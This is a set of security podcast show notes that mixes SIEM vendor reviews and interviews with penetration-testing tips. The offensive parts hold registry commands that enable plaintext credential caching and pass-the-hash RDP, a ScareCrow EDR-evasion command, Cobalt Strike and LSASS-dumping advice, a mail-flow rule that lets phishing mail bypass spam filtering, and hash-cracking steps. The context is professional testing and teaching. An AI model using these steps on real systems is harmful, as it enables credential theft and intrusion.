Today we have some cool updates on this SIEM-focused series we've been doing for a while. Specifically, I want to share that one of these solutions can now detect three early (and important!) warning signs that bad things are happening in your environment: ASREPRoasting WDigest flag getting flipped (reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1) Restricted admin mode getting enabled (reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f) - see n00py's blog for more info

Hi everybody, today we're continuing a series we started way back in June called Securing Your Mental Health. Today I talk about some easy and relatively cheap things I'm doing to try and shutdown negative thoughts, punch imposter syndrome in the face, and be an overall happier and more positive person.  

Hey friends, today I'm giving you a peek behind the curtain of our Light Pentest LITE training to talk about the software/hardware we use to make it sing, the growing pains - and OMG(!) moments - that forced us to build in more infrastructure redundancy, and the cool (and expensive!) cloud options we're considering to offer a self-paced version of the course.

Today's tale of pentesting has a bunch of tips to help you maximize your pwnage, including: The new Responder DHCP poisoning module All the cool bells and whistles from CrackMapExec which now include new lsass-dumping modules! Speaking of lsass dumping, here's a new trick that works if you have Visual Studio installed (I bet it will be detected soon). I close out today's episode with a story about how my Cobalt Strike beacons got burned by a dating site!

Today we continue our SIEM/SOC evaluation series with a closer look at one particular managed solution and how it fared (very well) against a very hostile environment: the Light Pentest LITE pentesting course! Spoiler alert: this solution was able to detect: RDP from public IPs Password spraying Kerberoasting Mimikatz Recon net commands Hash dumping Hits on a "honey domain admin" account Users with non-expiring passwords Hits on the SSH/FTP/HTTP honeypot

Hey, remember back in episode #357 where we introduced 7MOIST (7 Minutes of IT and Security Tips)? Yeah, me neither :-). Anyway, we're back with the second edition of 7MOIST and have some cool pentesting and general IT tips that will hopefully make your life a little awesome-r: Stuck on a pentest because EDR keeps gobbling your payloads? SharpCradle might just save the day! CrackMapExec continues to learn new awesome tricks - including a module called slinky that plants hash-grabbing files on shares you have write access to! Browsing 17 folders deep in Windows Explorer and wish you could just pop a cmd.exe from right there? You can! Just click into the path where you're browsing, type cmd.exe, hit Enter and BOOM! Welcome to a prompt right at that folder!

Hello friends! We're long overdue for a tale of pentest pwnage, and this one is a humdinger! It's actually kind of three tales in one, focusing on pentesting wins using: Manual "open heart surgery" on the root of the Active Directory domain The new totally rad DHCP poisoning module of Responder An opportunity to abuse GPOs with SharpGPOAbuse (P.S. we talked about this tool about a year ago in episode 441)

Today we're joined by Louis Evans of Arctic Wolf to talk about all things cyber insurance, including: History on cyber insurance - who's buying it, what it does and doesn't cover, and when it started to be something you didn't want to leave home without What are insurance companies asking/demanding of customers before writing a cyber insurance policy? What basic things organizations can do to reduce malware/ransomware incidents (whether they are considering a cyber insurance policy or not)? How do I evaluate the various insurance carriers out there and pick a good one?

Hey friends! Today we're going to recap the SIEM/SOC players we've evaluated so far (Arctic Wolf, Elastic, Sumo Logic, Milton Security) and then talk about a new contender that was brought to our attention: Blumira (not a sponsor, but I'm really digging what I'm seeing/hearing/experiencing thus far)!

Today we're talking about Ping Castle (not a sponsor), an awesome tool for enumerating tons of info out of your Active Directory environment and identifying weaknesses, misconfigurations and paths to escalation! It's wonderful for both red and blue teamers. Some of Ping Castle's cool features include being able find: Kerberoastable and ASREPRoastable users Plain text passwords lingering in Group Policy Objects Users with never-expiring passwords Non-supported versions of Windows Machines configured with unconstrained delegation Attack and escalation paths to Domain Admins

Today we continue our series focused on building a security consultancy and talk about: A phishing campaign that went off the rails, and lessons learned from it First impressions of an awesome tool to help add MFA to your Active Directory (not a sponsor) A tangent story about how my wife brought some thieves to justice!

Hey friends! Today I've got some exciting personal/professional news to share: our Light Pentest eBook - which is a practical, step-by-step playbook for internal network penetration testing - is now available for purchase! Note: this eBook and the Light Pentest LITE training are two separate things, but do cover some of the same topics. The Light Pentest eBook covers: Grabbing and analyzing packet captures Abusing insecure network protocols Exploiting (the lack of) SMB signing Capturing, cracking and passing hashes Locating high-value targets with DNS zone transfers Exploiting vulnerable Group Policy Objects Scraping screenshots of Web interfaces with WitnessMe Finding and cracking "Kerberoastable" and "ASREPRoastable" Active Directory accounts Dumping, passing and cracking hashes from domain controllers The Light Pentest eBook is available now for $7.77, and by purchasing it you are entitled to all future editions/revisions going forward.

Today our good buddy Joe Skeen and I virtually sit down with Matt Quammen of Blue Team Alpha to talk about all things incident response! Topics covered include: Top 5 things to do and not do during ransomware event Challenges when responding to ransomware events Opportunities to break into infosec/IR The value of tabletop exercises, and some great ideas for conducting your own Incident response stress and success stories Cyber insurance - worth it or not?

Today our friend Christopher Fielder from Arctic Wolf is back for an interview four-peat! We had a great chat about making sense of vendor alphabet soup terms (like SIEM, SOC, EDR/MDR/XDR, ML, AI and more!), optimizing your SOC to "see" as much as possible, tackling vendor/customer communication problems, and simplifying security product pricing to make purchases less stressful for customers! And don't forget to check out Christopher's first, second and third interviews with 7MS.

Today we're continuing our series called Desperately Seeking a Super SIEM for SMBs - this time with a focus on a new contender in our bake-off: Perch Security! It might help you to go back and take in part 1 and part 2, but today we're focusing on the first experience I had chatting with the sales/technical folks at Perch. TLDL: I really liked a lot of things I was hearing and seeing. Pros (perceived) include: Simple pricing model Easy to use dashboard Cool "marketplace" of integrations you can add to your instance and start getting alerts for Nice API integration that seemed pretty simple to use - and that covers a lot of different cloud products and services Ticket dashboard looked straightfoward to use and interpret Can quickly add IPs/subnets that you don't want to monitor, if appropriate

Today we continue our series we started recently (part 1 is here about finding a super SIEM for SMBs. Specifically I have some updates on (and frustrations with) Arctic Wolf, Elastic, Milton Security and Perch Security. Here's the TLDL version: Arctic Wolf They remain a strong contender in my bake-offs. They also could tick several boxes for an org as they offer continuous internal/external vulnerability scanning as well as a managed SOC. (And yes, I'm probably a tiny bit biased because I know a bunch of AWN's engineers and like the product) Elastic I've loved my interactions with the sales folks and engineers at Elastic. My initial trial had some technical speed bumps (which Elastic helped me remedy). I eventually did get some Elastic agents enrolled on endpoints in my lab. However, now that I'm up and running (and admittedly I should go through the Webinars and online training), I'm feeling overwhelmed. There's a jillion menus and submenus to explore. I feel like I've been given a high-performance sports car but completely lack the knowledge on how to make the most of it. I'll keep Elastic in my back pocket, but I don't think I can feel comfortable handing this dashboard over to a SMB IT/security staff and have them run with it. Milton Security A few weeks ago I had my first ever sales call with this group, and liked a lot of what I heard. They're up front about being a threat-hunt-as-a-service organization and they're not looking to partner with just any customer. The way they bundle sources of data (for the sake of pricing) makes sense to me, and although I haven't seen a formal quote from them yet, I think they will be reasonably priced when compared to some of the "big box" solutions. Perch Security After part 1 of this series, several of you pinged me and said to check out Perch Security. I'm very excited to connect with them but had a tough time getting someone to respond to my inquires (two weeks to be exact). Good news is I've got a call scheduled with them this week and am anxious to share what I learn about Perch on our next episode in this series.

Today we're continuing our discussion on phishing campaigns - including a technical "gotcha" that might redirect your phishing emails into a digital black hole if you're not careful! As I mentioned last week, I've been heavy into spinning up and tearing down phishing campaigns, so I finally got around to documenting everything in episode 481. This week I ran into a bizarre issue where test phishes to myself suddenly disappeared from my Outlook altogether! After chatting with some folks on Slack I did a message trace in the Exchange Admin Center under: Mail flow > Message Trace > Start a trace then make the Sender field be the user you're sending phishing emails from. That showed me that my phishes were being quarantined! To get around the quarantine, I went into Mail flow > Rules and then created a new rule with the following properties: Apply this rule if > The sender's domain is > yourphishingdomain.com Then under Do the following: Set the spam confidence level (SCL) to...Bypass spam filtering Under And, click the drop-down and choose: Modify the message properties...set a message header...X-MS-Exchange-Organization-BypassClutter Then click where it says Enter text and change header value to True and click OK.

Today we're revisiting how to make a kick-butt cred-capturing phishing campaign with Gophish, Amazon Lightsail, LetsEncrypt, ExpiredDomains.net and a special little extra something that makes creating phishing landing pages waaaaaaayyyyyyyyyy easier! For some quicker review, you can check out part 1 and also the complementary YouTube video, but I wanted to revisit this kick-butt process and update a few items: First, this SingleFile extension is amaaaaaaaazing for making phishing landing pages with ease! The process to get GApps to let you generate an app-specific password for using with GoPhish is kinda annoying. The steps below should get you going: After domain registration, log into admin.google.com or click Manage Workspace button at checkout. At the next screen click Workspace Admin Console. Sign in with the person you’ll be spoofing from, and the temporary password emailed to your backup email account during checkout. In the search bar search for Less Secure Apps, choose Allow users to manage their access to less secure apps. Now, in the upper right, hit Manage Your Google Account. Under Security, click Protect your account and click Add phone number. Finish that process, then click Continue to your Google account. Back at the main admin page, under Less secure app access, click Turn on access (not recommended). At the next screen click Allow less secure apps: ON Back at the main screen, click 2-Step Verification and set it to On. Back at the main screen again, a new option called App passwords should be there. Click it. Choose to generate a custom name like LOL and then then an app password will appear. Write it down as it only appears once! Finally, a quick reference for getting your LetsEncrypt cert to work with GoPhish. Get your LetsEncrypt cert generated, and then forge a .crt and .key file to use with GoPhish: cp /etc/letsencrypt/live/YOUR-DOMAIN/fullchain.pem ./domain.crt cp /etc/letsencrypt/live/YOUR-DOMAIN/privkey.pem ./domain.key Now go into the GoPhish .json config file and change the cert_path and key_path to the ones you just generated, and change use_tls to TRUE on both places in the config as well.

Today we're talking about the SIEM bake-off for SMBs that we've recently embarked on. We're currently evaluating several solutions - either for customer-facing purposes, internal kick-the-tires fun, or both. Candiates include: Arctic Wolf Elastic Milton Security Protocol46 Sumo Logic First we're starting by running each vendor through a series of questions, then likely following up with a demo where we'll run some technical tests and simulated hacking to see which vendor or vendors reign supreme!

Hey friends, today we're talking about a new security training offering 7MinSec has created called Light Pentest LITE - Live Interactive Training Experience. It's a 3-day course (with each class session being 3 hours long) consisting of live (via Zoom), hands-on, instructor-led sessions that are focused on teaching you how to find, exploit and defend against common Active Directory weaknesses! Check out today's episode to learn more and get a hint for an OSINT exercise that will get you 10% off of a Light Pentest LITE training session!

Hey friends, today we're continuing our discussion of password cracking by sharing some methodology that has helped us get a high cred yield, and some tips on taking cracked passwords from multiple sources and Frankensteining them into a beautiful report for your customer. For some background, when 7MS started as a biz, we used to crack passwords in Paperspace but invested in an on-prem cracking rig a few years ago. That rig has been flipping sweet, but had some heating issues which prompted me to send the system in for warranty and use an awesome cracking rig in AWS in the meantime. Whether you're cracking locally or in the cloud, here's a quick methodology that has cracked many a hash for us: Do a straight-up hashcat crack against the PwnedPasswords list (at time of this writing I don't have a good source for the cracked versions of these passwords. I used to grab them at hashes.org. Anybody got an alternative? Do a straight-up hashcat crack through the RockYou2021 list Run the hatecrack methodology, including the quick crack, the quick crack with rules (I'm partial to OneRuleToRuleThemAll), and brute-forcing all 1-8 character passwords Once I'm ready to wrap up all the cracked passwords and put them in a nice shiny report for the customer, I do the following (using hashcombiner and pipal): # Run hash_combiner on hashcat’s pot file and write results to a file python /opt/hc/hash_combiner.py user_hash /opt/hashcat/hashcat.potfile > /tmp/round1.txt # Run hash_combiner on hatecrack’s pot file and write results to a file python /opt/hc/hash_combiner.py user_hash /opt/hatecrack/hashcat.pot > /tmp/round2.txt # Cat the two files together into a third file cat /tmp/round1.txt /tmp/round2.txt > /tmp/round3.txt # Sort and de-dupe the third file cat /tmp/round3.txt | sort -uf > /tmp/nice-and-clean.txt # Take just the passwords out of the “nice and clean” output cut -d ':' -f 2 /tmp/nice-and-clean.txt > /tmp/pipal-temp.txt # Score the passwords using pipal /opt/pipal/pipal.rb /tmp/pipal-temp.txt > /tmp/pip-final.txt Now you've got a nice-and-clean.txt list of users and their cracked passwords, as well as the pip-final.txt with deeper analysis of cracked passwords, their commonalities, etc.

Today we're talking about Cobalt Strike for newbs - including how to get it up and running, as well as some tools that will help you generate beacons while evading EDR at the same time! Some helpful things mentioned in today's episode: Wherever you spin up your CS instance, it's probably a good idea to lock down the firewall to only specific IPs. With Digital Ocean, I found this article helpful. When generating CS listeners, the C2Concealer from FortyNorth helped me get malleable C2 profiles generated while creating a LetsEncrypt cert at the same time! My CS beacons kept getting gobbled by AV, but the following resources helped me get some stealthy ones generated: Artifact Kit, PEzor and ScareCrow. Here's a specific ScareCrow example that flew under the EDR radar: Scarecrow -I myrawshellcode.bin -etw -domain www.microsoft.com PowerUpSQL is awesome for finding servers where you can run stored procedures to send your attacking box a priv'd hash to pass/capture/crack. Check out this presentation on PowerUpSQL to find vulnerable targets, then use mssql_ntlm_stealer module in Metasploit to have fun with the account hashes. Be sure to set your domain when configuring the Metasploit module! When trying to pop an SMB shell with relay tools, I've had problems recently with those attempts being stopped by defensive tools. Then I found this gem which talks about tweaking smbexec.py to evade AV. It worked a treat! When you use MultiRelay, I had no idea that it includes an upload function so you can simply upload your beacon.exe from a SYSTEM shell and fire it right from a command line. Cool! Once my beacons started firing around the pentest environment, I temporarily allowed all IPs to talk to my Digital Ocean box - just because the IP I grabbed from a "what is my IP?" Google search didn't always match the actual beacons that called home. Once the beacon connectivity was established, I tweaked the beacon firewall rules to just let certain IPs in the door. This Cobalt Strike Extension Kit was FREAKING sweet for adding "right click > do awesome stuff" functionality to CS like dump hashes, search for Kerberoastable accounts, setup persistence, etc. Got a SYSTEM level shell but need to abuse a DA's privs? Tell the beacon to pull back a list of running processes, then click one (like explorer.exe) running under a DA's account and then impersonate it to add your account to the DA group! Having issues dumping LSASS? This article from Red Canary gives you some great ideas to do it in a way that doesn't make AV throw a fit! Trying to RDP using PtH? This article will help you out. And if you get warnings about not being able to RDP in because of some sort of login restriction, try adjusting this reg key with CME: cme smb 10.1.2.3 -u Administrator -H THE-HASH-YOU-CAPTURED -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f'

**STOP!** If you didn't listen to [last week's episode](https://7ms.us/7ms-475-tales-of-internal-network-pentest-pwnage-part-27/) you might want to, since this was a two-part tale of pwnage. Either way I'll get you up to speed and talk about why this was (of course) one of my favorite pentests ever.

Yeahhhhhh! Today's another fun tale of pentest pwnage, including: The importance of starting your pentest with an AD account that actually has access to...ya know...stuff The importance of starting your pentest plugged into a network that actually has...you know...systems connected to it! This BHIS article is awesome for finding treasures in SMB shares PowerUpSQL audits are a powerful way to get pwnage on a pentest - check out this presentation for some practical how-to advice IPMI/BMCs often have weak creds and/or auth bypasses so don't forget to check for them. Rapid7 has a slick blog on the topic. Don't forget to check for vulnerable VMWare versions because some of them have major vulnerabilities

Hey friends! Today we're dusting off an old mini-series about password cracking in the cloud (check out part 1 and part 2) and sharing some awesome info on building a monster of a cracking rig in AWS! One reason we haven't talked about password cracking in the cloud in a while is because back in winter of 2019 I built baby's first password cracking. Unfortunately, this week, Hashy (the name I gave to the rig) is overheating, and GPUs are impossible to find, so what's a pentester to do? Well, in today's episode I talk about this article from Sevnx which walks you through building a virtual password-cracking beast in the cloud. The article (complemented by a sweet video) will get you running in short order. WARNING: running this instance is super expensive (the author warns the instance would cost ~$9k/month if you left it run continuously). The steps are pretty straightforward, but between reboots I found that hashcat acted all wonky. Luckily, the article addresses that with this great tip: Pro tip: Save the Cuda download somewhere. If you ever turn your cracker off and get errors running hashcat when you turn it back on, re-run the install line. We think AWS sometimes refreshes the drivers or something and hashcat doesn't like it very much. If you need help installing one of my fave tools, hatecrack check out my password cracking in the cloud gist. Also, our buddy Joe pointed me towards a utility called duplicut to help de-dupe large password-cracking wordlists. Once the AWS instance is setup, what kind of stats do we get out of this demon? Here's the result of hashcat -b: Hashmode: 0 - MD5 Speed.#1.........: 55936.1 MH/s (47.79ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8 Speed.#2.........: 55771.4 MH/s (47.94ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8 Speed.#3.........: 55827.0 MH/s (47.88ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8 Speed.#4.........: 55957.7 MH/s (47.78ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8 Speed.#*.........: 223.5 GH/s Hashmode: 100 - SHA1 Speed.#1.........: 17830.1 MH/s (75.08ms) @ Accel:16 Loops:1024 Thr:1024 Vec:1 Speed.#2.........: 17774.0 MH/s (75.21ms) @ Accel:16 Loops:1024 Thr:1024 Vec:1 Speed.#3.........: 17780.9 MH/s (75.26ms) @ Accel:16 Loops:1024 Thr:1024 Vec:1 Speed.#4.........: 17795.6 MH/s (75.22ms) @ Accel:16 Loops:1024 Thr:1024 Vec:1 Speed.#*.........: 71180.6 MH/s Hashmode: 1400 - SHA2-256 Speed.#1.........: 7709.9 MH/s (86.84ms) @ Accel:8 Loops:1024 Thr:1024 Vec:1 Speed.#2.........: 7718.3 MH/s (86.75ms) @ Accel:8 Loops:1024 Thr:1024 Vec:1 Speed.#3.........: 7710.4 MH/s (86.75ms) @ Accel:8 Loops:1024 Thr:1024 Vec:1 Speed.#4.........: 7694.4 MH/s (87.02ms) @ Accel:8 Loops:1024 Thr:1024 Vec:1 Speed.#*.........: 30833.0 MH/s Hashmode: 1700 - SHA2-512 Speed.#1.........: 2399.8 MH/s (69.70ms) @ Accel:8 Loops:256 Thr:1024 Vec:1 Speed.#2.........: 2401.1 MH/s (69.68ms) @ Accel:8 Loops:256 Thr:1024 Vec:1 Speed.#3.........: 2397.3 MH/s (69.78ms) @ Accel:8 Loops:256 Thr:1024 Vec:1 Speed.#4.........: 2400.3 MH/s (69.70ms) @ Accel:8 Loops:256 Thr:1024 Vec:1 Speed.#*.........: 9598.5 MH/s Hashmode: 22000 - WPA-PBKDF2-PMKID+EAPOL (Iterations: 4095) Speed.#1.........: 866.5 kH/s (94.23ms) @ Accel:16 Loops:256 Thr:1024 Vec:1 Speed.#2.........: 866.7 kH/s (94.21ms) @ Accel:16 Loops:256 Thr:1024 Vec:1 Speed.#3.........: 865.6 kH/s (94.30ms) @ Accel:16 Loops:256 Thr:1024 Vec:1 Speed.#4.........: 866.7 kH/s (94.20ms) @ Accel:16 Loops:256 Thr:1024 Vec:1 Speed.#*.........: 3465.5 kH/s Hashmode: 1000 - NTLM Speed.#1.........: 102.2 GH/s (26.05ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8 Speed.#2.........: 102.3 GH/s (26.05ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8 Speed.#3.........: 102.2 GH/s (26.07ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8 Speed.#4.........: 102.3 GH/s (26.04ms) @ Accel:32 Loops:1024 Thr:1024 Vec:8 Speed.#*.........: 409.0 GH/s Hashmode: 3000 - LM Speed.#1.........: 41104.7 MH/s (64.74ms) @ Accel:512 Loops:1024 Thr:64 Vec:1 Speed.#2.........: 40216.5 MH/s (66.11ms) @ Accel:512 Loops:1024 Thr:64 Vec:1 Speed.#3.........: 40507.3 MH/s (65.89ms) @ Accel:512 Loops:1024 Thr:64 Vec:1 Speed.#4.........: 39181.4 MH/s (68.13ms) @ Accel:512 Loops:1024 Thr:64 Vec:1 Speed.#*.........: 161.0 GH/s Hashmode: 5500 - NetNTLMv1 / NetNTLMv1+ESS Speed.#1.........: 55861.0 MH/s (47.87ms) @ Accel:32 Loops:1024 Thr:1024 Vec:2 Speed.#2.........: 55864.3 MH/s (47.87ms) @ Accel:32 Loops:1024 Thr:1024 Vec:2 Speed.#3.........: 55519.4 MH/s (47.98ms) @ Accel:32 Loops:1024 Thr:1024 Vec:2 Speed.#4.........: 55826.6 MH/s (47.89ms) @ Accel:32 Loops:1024 Thr:1024 Vec:2 Speed.#*.........: 223.1 GH/s Hashmode: 5600 - NetNTLMv2 Speed.#1.........: 3968.0 MH/s (84.37ms) @ Accel:4 Loops:1024 Thr:1024 Vec:1 Speed.#2.........: 3968.1 MH/s (84.38ms) @ Accel:4 Loops:1024 Thr:1024 Vec:1 Speed.#3.........: 3965.6 MH/s (84.38ms) @ Accel:4 Loops:1024 Thr:1024 Vec:1 Speed.#4.........: 3967.8 MH/s (84.37ms) @ Accel:4 Loops:1024 Thr:1024 Vec:1 Speed.#*.........: 15869.5 MH/s Hashmode: 1500 - descrypt, DES (Unix), Traditional DES Speed.#1.........: 1752.8 MH/s (95.32ms) @ Accel:32 Loops:1024 Thr:64 Vec:1 Speed.#2.........: 1729.3 MH/s (96.65ms) @ Accel:32 Loops:1024 Thr:64 Vec:1 Speed.#3.........: 1749.5 MH/s (95.53ms) @ Accel:32 Loops:1024 Thr:64 Vec:1 Speed.#4.........: 1740.6 MH/s (96.01ms) @ Accel:32 Loops:1024 Thr:64 Vec:1 Speed.#*.........: 6972.3 MH/s Hashmode: 500 - md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) (Iterations: 1000) Speed.#1.........: 24882.8 kH/s (50.59ms) @ Accel:16 Loops:1000 Thr:1024 Vec:1 Speed.#2.........: 24828.0 kH/s (50.60ms) @ Accel:16 Loops:1000 Thr:1024 Vec:1 Speed.#3.........: 24865.7 kH/s (50.60ms) @ Accel:16 Loops:1000 Thr:1024 Vec:1 Speed.#4.........: 24849.6 kH/s (50.59ms) @ Accel:16 Loops:1000 Thr:1024 Vec:1 Speed.#*.........: 99426.0 kH/s Hashmode: 3200 - bcrypt $2*$, Blowfish (Unix) (Iterations: 32) Speed.#1.........: 69071 H/s (54.00ms) @ Accel:4 Loops:16 Thr:24 Vec:1 Speed.#2.........: 68818 H/s (54.25ms) @ Accel:4 Loops:16 Thr:24 Vec:1 Speed.#3.........: 68926 H/s (54.13ms) @ Accel:4 Loops:16 Thr:24 Vec:1 Speed.#4.........: 69013 H/s (54.04ms) @ Accel:4 Loops:16 Thr:24 Vec:1 Speed.#*.........: 275.8 kH/s Hashmode: 1800 - sha512crypt $6$, SHA512 (Unix) (Iterations: 5000) Speed.#1.........: 386.4 kH/s (84.04ms) @ Accel:8 Loops:256 Thr:1024 Vec:1 Speed.#2.........: 377.9 kH/s (85.68ms) @ Accel:8 Loops:256 Thr:1024 Vec:1 Speed.#3.........: 372.3 kH/s (86.76ms) @ Accel:8 Loops:256 Thr:1024 Vec:1 Speed.#4.........: 382.7 kH/s (84.51ms) @ Accel:8 Loops:256 Thr:1024 Vec:1 Speed.#*.........: 1519.3 kH/s Hashmode: 7500 - Kerberos 5, etype 23, AS-REQ Pre-Auth Speed.#1.........: 1177.0 MH/s (71.08ms) @ Accel:256 Loops:128 Thr:32 Vec:1 Speed.#2.........: 1175.4 MH/s (71.17ms) @ Accel:256 Loops:128 Thr:32 Vec:1 Speed.#3.........: 1171.5 MH/s (71.28ms) @ Accel:256 Loops:128 Thr:32 Vec:1 Speed.#4.........: 1177.4 MH/s (71.05ms) @ Accel:256 Loops:128 Thr:32 Vec:1 Speed.#*.........: 4701.3 MH/s Hashmode: 13100 - Kerberos 5, etype 23, TGS-REP Speed.#1.........: 1068.5 MH/s (78.29ms) @ Accel:32 Loops:1024 Thr:32 Vec:1 Speed.#2.........: 1069.4 MH/s (78.25ms) @ Accel:32 Loops:1024 Thr:32 Vec:1 Speed.#3.........: 1068.4 MH/s (78.32ms) @ Accel:32 Loops:1024 Thr:32 Vec:1 Speed.#4.........: 1068.6 MH/s (78.29ms) @ Accel:32 Loops:1024 Thr:32 Vec:1 Speed.#*.........: 4275.0 MH/s Hashmode: 15300 - DPAPI masterkey file v1 (Iterations: 23999) Speed.#1.........: 148.5 kH/s (93.95ms) @ Accel:8 Loops:512 Thr:1024 Vec:1 Speed.#2.........: 148.4 kH/s (93.99ms) @ Accel:8 Loops:512 Thr:1024 Vec:1 Speed.#3.........: 148.5 kH/s (93.96ms) @ Accel:8 Loops:512 Thr:1024 Vec:1 Speed.#4.........: 148.4 kH/s (93.95ms) @ Accel:8 Loops:512 Thr:1024 Vec:1 Speed.#*.........: 593.8 kH/s Hashmode: 15900 - DPAPI masterkey file v2 (Iterations: 12899) Speed.#1.........: 80610 H/s (80.47ms) @ Accel:4 Loops:256 Thr:1024 Vec:1 Speed.#2.........: 80606 H/s (80.47ms) @ Accel:4 Loops:256 Thr:1024 Vec:1 Speed.#3.........: 80596 H/s (80.48ms) @ Accel:4 Loops:256 Thr:1024 Vec:1 Speed.#4.........: 80378 H/s (80.46ms) @ Accel:4 Loops:256 Thr:1024 Vec:1 Speed.#*.........: 322.2 kH/s Hashmode: 7100 - macOS v10.8+ (PBKDF2-SHA512) (Iterations: 1023) Speed.#1.........: 1002.4 kH/s (78.60ms) @ Accel:32 Loops:31 Thr:1024 Vec:1 Speed.#2.........: 1002.4 kH/s (78.60ms) @ Accel:32 Loops:31 Thr:1024 Vec:1 Speed.#3.........: 1002.1 kH/s (78.62ms) @ Accel:32 Loops:31 Thr:1024 Vec:1 Speed.#4.........: 1002.7 kH/s (78.58ms) @ Accel:32 Loops:31 Thr:1024 Vec:1 Speed.#*.........: 4009.6 kH/s Hashmode: 11600 - 7-Zip (Iterations: 16384) Speed.#1.........: 897.6 kH/s (82.05ms) @ Accel:4 Loops:4096 Thr:1024 Vec:1 Speed.#2.........: 896.4 kH/s (82.09ms) @ Accel:4 Loops:4096 Thr:1024 Vec:1 Speed.#3.........: 893.3 kH/s (83.60ms) @ Accel:4 Loops:4096 Thr:1024 Vec:1 Speed.#4.........: 912.4 kH/s (81.95ms) @ Accel:4 Loops:4096 Thr:1024 Vec:1 Speed.#*.........: 3599.7 kH/s Hashmode: 12500 - RAR3-hp (Iterations: 262144) Speed.#1.........: 116.6 kH/s (60.91ms) @ Accel:16 Loops:16384 Thr:128 Vec:1 Speed.#2.........: 111.4 kH/s (63.61ms) @ Accel:16 Loops:16384 Thr:128 Vec:1 Speed.#3.........: 111.6 kH/s (63.63ms) @ Accel:16 Loops:16384 Thr:128 Vec:1 Speed.#4.........: 115.0 kH/s (61.81ms) @ Accel:16 Loops:16384 Thr:128 Vec:1 Speed.#*.........: 454.7 kH/s Hashmode: 13000 - RAR5 (Iterations: 32799) Speed.#1.........: 93248 H/s (54.69ms) @ Accel:16 Loops:128 Thr:1024 Vec:1 Speed.#2.........: 93202 H/s (54.72ms) @ Accel:16 Loops:128 Thr:1024 Vec:1 Speed.#3.........: 93009 H/s (54.70ms) @ Accel:16 Loops:128 Thr:1024 Vec:1 Speed.#4.........: 93241 H/s (54.69ms) @ Accel:16 Loops:128 Thr:1024 Vec:1 Speed.#*.........: 372.7 kH/s Hashmode: 6211 - TrueCrypt RIPEMD160 + XTS 512 bit (Iterations: 1999) Speed.#1.........: 672.2 kH/s (55.34ms) @ Accel:16 Loops:64 Thr:1024 Vec:1 Speed.#2.........: 672.1 kH/s (55.34ms) @ Accel:16 Loops:64 Thr:1024 Vec:1 Speed.#3.........: 671.4 kH/s (55.34ms) @ Accel:16 Loops:64 Thr:1024 Vec:1 Speed.#4.........: 672.2 kH/s (55.34ms) @ Accel:16 Loops:64 Thr:1024 Vec:1 Speed.#*.........: 2687.9 kH/s Hashmode: 13400 - KeePass 1 (AES/Twofish) and KeePass 2 (AES) (Iterations: 24569) Speed.#1.........: 111.2 kH/s (122.52ms) @ Accel:32 Loops:128 Thr:1024 Vec:1 Speed.#2.........: 111.1 kH/s (122.55ms) @ Accel:32 Loops:128 Thr:1024 Vec:1 Speed.#3.........: 111.2 kH/s (122.58ms) @ Accel:32 Loops:128 Thr:1024 Vec:1 Speed.#4.........: 111.2 kH/s (122.52ms) @ Accel:32 Loops:128 Thr:1024 Vec:1 Speed.#*.........: 444.7 kH/s Hashmode: 6800 - LastPass + LastPass sniffed (Iterations: 499) Speed.#1.........: 5944.3 kH/s (35.66ms) @ Accel:8 Loops:249 Thr:1024 Vec:1 Speed.#2.........: 5942.0 kH/s (35.66ms) @ Accel:8 Loops:249 Thr:1024 Vec:1 Speed.#3.........: 5939.0 kH/s (35.67ms) @ Accel:8 Loops:249 Thr:1024 Vec:1 Speed.#4.........: 5943.8 kH/s (35.66ms) @ Accel:8 Loops:249 Thr:1024 Vec:1 Speed.#*.........: 23769.0 kH/s Hashmode: 11300 - Bitcoin/Litecoin wallet.dat (Iterations: 200459) Speed.#1.........: 11370 H/s (73.48ms) @ Accel:2 Loops:1024 Thr:1024 Vec:1 Speed.#2.........: 11355 H/s (73.50ms) @ Accel:2 Loops:1024 Thr:1024 Vec:1 Speed.#3.........: 11369 H/s (73.49ms) @ Accel:2 Loops:1024 Thr:1024 Vec:1 Speed.#4.........: 11370 H/s (73.49ms) @ Accel:2 Loops:1024 Thr:1024 Vec:1 Speed.#*.........: 45464 H/s For a real world example, I had ~1,500 NTLM hashes to crack that I ran through some of the hatecrack methodology, and here's how the instance performed: 100 LM hashes discovered, all cracked in 7 minutes (heh, 7 minutes :-) Ran hatecrack's quick crackw ith no rules: done in 7 minutes, cracked 108 accounts Quick crack against one rule to rule them all: ran in 25 minutes, got got 271 new passwords Ran extensive hatecrack methodology, it ran for a little over 2 hours and got 88 new passwords. All said and done, about 1/3 of the passwords cracked in about 3 hours. Not bad! Don't forget, the second you're done with your cracking efforts, SHUT THE BOX DOWN! Otherwise you're in for a sour surprise come AWS billing day :-( On a few personal notes: Last Comic Standing was the show I couldn't think of during the episode :-) After a toxic non-toxic foam pit incident a few years ago, my family and I had another injury this weekend with a rented waterslide - the fun ended in a concussion!

Hey everybody! Today Joe and I sat down with Nikhil Mittal of Pentester Academy and Altered Security to talk about a whole slew of fun security topics: How Nikhil first got involved in Pentester Academy Nikhil's hacker origin story How does Nikhil feel about his tools being used by baddies? What security tools/defenses would be good for SMBs to focus on? Active Directory security - is all hope lost? Will AI, ML, Terminator robots, etc. replace all of us who do pentesting for a living?

Hey everybody! Today Joe and I sat down with Nikhil Mittal of Pentester Academy and Altered Security to talk about a whole slew of fun security topics: How Nikhil first got involved in Pentester Academy Nikhil's hacker origin story How does Nikhil feel about his tools being used by baddies? What security tools/defenses would be good for SMBs to focus on? Active Directory security - is all hope lost? Will AI, ML, Terminator robots, etc. replace all of us who do pentesting for a living?

